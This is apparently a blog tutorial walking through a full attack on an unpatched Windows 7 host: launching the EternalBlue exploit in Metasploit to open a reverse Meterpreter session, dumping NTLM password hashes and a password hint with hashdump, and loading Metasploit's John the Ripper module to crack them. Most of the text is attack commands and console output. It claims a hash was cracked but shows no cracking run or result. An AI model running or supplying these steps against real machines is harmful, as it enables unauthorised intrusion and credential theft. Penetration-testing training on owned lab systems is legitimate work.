UA-105034858-1

How To Use John the Ripper in Metasploit to Quickly Crack Windows Hashes

Comments · 70 Views

There are many password-cracking tools out there, but one of the mainstays has always been John the Ripper. It's a powerful piece of software that can be configured and used in many different ways.

this article is for education purposes only!

Metasploit actually contains a little-known module version of JTR that can be used to quickly crack weak passwords, so let's explore it in an attempt to save precious time and effort.

 

We will be using an unpatched version of Windows 7 as the target, so if you have a copy lying around, feel free to use it. The method of exploitation doesn't matter so much here, as long as you can get a Meterpreter session on the target. John the Ripper module should work on any version of Windows we can grab the hashes from. In this tutorial, we will obtain the hash of an additional user that has logged onto the system (admin2).

Step 1: Compromise the PC

 

To begin, we will need to compromise the target and get a Meterpreter session. Since we know the target is running an unpatched version of Windows 7, we can use EternalBlue to quickly exploit the system from our Kali box.
We will need Metasploit's built-in database up and running for the John the Ripper module to work later, so start it with the following command:

~# service postgresql start
Then, fire up Metasploit by typing msfconsole in the terminal:
~# msfconsole [-] ***rting the Metasploit Framework console.../ [-] * WARNING: No database support: No database YAML file [-] *** . . . dBBBBBBb dBBBP dBBBBBBP dBBBBBb . o ' dB' BBP dB'dB'dB' dBBP dBP dBP BB dB'dB'dB' dBP dBP dBP BB dB'dB'dB' dBBBBP dBP dBBBBBBB dBBBBBP dBBBBBb dBP dBBBBP dBP dBBBBBBP . . dB' dBP dB'.BP | dBP dBBBB' dBP dB'.BP dBP dBP --o-- dBP dBP dBP dB'.BP dBP dBP | dBBBBP dBP dBBBBP dBBBBP dBP dBP . . o To boldly go where no shell has gone before =[ metasploit v5.0.20-dev ] + -- --=[ 1886 exploits - 1065 auxiliary - 328 post ] + -- --=[ 546 payloads - 44 encoders - 10 nops ] + -- --=[ 2 evasion ]

Next, load the EternalBlue exploit module with the use command:

msf5 use exploit/windows/smb/ms17_010_eternalblue

Set the appropriate options, and type run to launch:

msf5 exploit(windows/smb/ms17_010_eternalblue) run [*] Started reverse TCP handler on 10.10.0.1:1337 [+] 10.10.0.104:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit) [*] 10.10.0.104:445 - Connecting to target for exploitation. [+] 10.10.0.104:445 - Connection established for exploitation. [+] 10.10.0.104:445 - Target OS selected valid for OS indicated by SMB reply [*] 10.10.0.104:445 - CORE raw buffer dump (42 bytes) [*] 10.10.0.104:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes [*] 10.10.0.104:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv [*] 10.10.0.104:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1 [+] 10.10.0.104:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 10.10.0.104:445 - Trying exploit with 12 Groom Allocations. [*] 10.10.0.104:445 - Sending all but last fragment of exploit packet [*] 10.10.0.104:445 - Starting non-paged pool grooming [+] 10.10.0.104:445 - Sending SMBv2 buffers [+] 10.10.0.104:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 10.10.0.104:445 - Sending final SMBv2 buffers. [*] 10.10.0.104:445 - Sending last fragment of exploit packet! [*] 10.10.0.104:445 - Receiving response from exploit packet [+] 10.10.0.104:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 10.10.0.104:445 - Sending egg to corrupted connection. [*] 10.10.0.104:445 - Triggering free of corrupted buffer. [*] Sending stage (206403 bytes) to 10.10.0.104 [*] Meterpreter session 1 opened (10.10.0.1:1337 - 10.10.0.104:49212) at 2019-06-27 11:56:09 -0500 [+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= meterpreter

 

Step 2

Grab Some Hashes

The next thing we need to do is obtain the hashes of any users on the system. Meterpreter has an awesome feature called hashdump that will automatically dump the hashes for us:

meterpreter hashdump admin2:1000:aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7::: Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Unfortunately, all this does is display them on-screen. We need to save these to the database so the JTR module can work its magic. First, background the current session:

meterpreter background [*] Backgrounding session 1...

Then, we can use the hashdump post module to grab the hashes from our target. Load it with the use command:

msf5 exploit(windows/smb/ms17_010_eternalblue) use post/windows/gather/hashdump

 

Metasploit post modules work by running on an existing session, which is why we need to background the session in the first place. We can type options to display the settings for the module:

msf5 post(windows/gather/hashdump) options Module options (post/windows/gather/hashdump): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on.

 

All we need to do is specify the session number we want to run this on. Use the set command to set the session to 1 (or whatever session number that is running in the background):

msf5 post(windows/gather/hashdump) set session 1 session = 1
Now, simply type run and the module will gather the hashes:
msf5 post(windows/gather/hashdump) run [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 1c8cfe9e1146578ee29d759b84a0ab70... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hints... admin2:"shots" [*] Dumping password hashes... Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: admin2:1000:aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7::: [*] Post module execution completed

 

We can see that we got the same hashes as before, but we also found a password hint for admin2. Nice. Now if we type creds at the prompt, Metasploit will display all the credentials that are currently stored in the database:
msf5 post(windows/gather/hashdump) creds Credentials =========== host origin service public private realm private_type JtR Format ---- ------ ------- ------ ------- ----- ------------ ---------- 10.10.0.104 10.10.0.104 445/tcp (smb) guest aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 NTLM hash nt,lm 10.10.0.104 10.10.0.104 445/tcp (smb) administrator aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 NTLM hash nt,lm 10.10.0.104 10.10.0.104 445/tcp (smb) admin2 aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7 NTLM hash nt,lm
This shows us the host, service, and associated credentials, as well as the hash type.

Now all that's left to do is crack that hash.

Step 3

Crack the Hash

Metasploit's John the Ripper module is extremely useful when you need to quickly crack hashes — without needing to bother loading up John externally. It is also useful to try as a first pass since it usually takes no time at all and could potentially uncover weak passwords.
Now that we have our hashes stored in the database, load the JTR module with the use command:

msf5 post(windows/gather/hashdump) use auxiliary/analyze/jtr_windows_fast

We can take a look at the available options for this module:

msf5 auxiliary(analyze/jtr_windows_fast) options Module options (auxiliary/analyze/jtr_windows_fast):

Name Current Setting Required Description ---- --------------- -------- ----------- CONFIG no The path to a John config file to use instead of the default CUSTOM_WORDLIST no The path to an optional custom wordlist ITERATION_TIMEOUT no The max-run-time for each iteration of cracking JOHN_PATH, no The absolute path to the John the Ripper executable KORELOGIC false no Apply the KoreLogic rules to Wordlist Mode(slower) MUTATE false no Apply common mutations to the Wordlist (SLOW) POT no The path to a John POT file to use instead of the default USE_CREDS true no Use existing credential data saved in the database USE_DB_INFO true no Use looted database schema info to seed the wordlist USE_DEFAULT_WORDLIST true no Use the default Metasploit wordlist USE_HOSTNAMES true no Seed the wordlist with hostnames from the workspace USE_ROOT_WORDS true no Use the Common Root Words Wordlist

 

In this tutorial, we learned about Metasploit's John the Ripper module and how to use it to quickly crack Windows hashes. We first exploited the target using EternalBlue and used the hashdump post module to grab user hashes and store them to the database. Then, we ran the JTR module right in Metasploit and cracked the hash of one of the users. Metasploit's JTR module makes it easy to obtain weak passwords in very little time, and it should be worth a shot in any Windows post-exploitation campaign.

Comments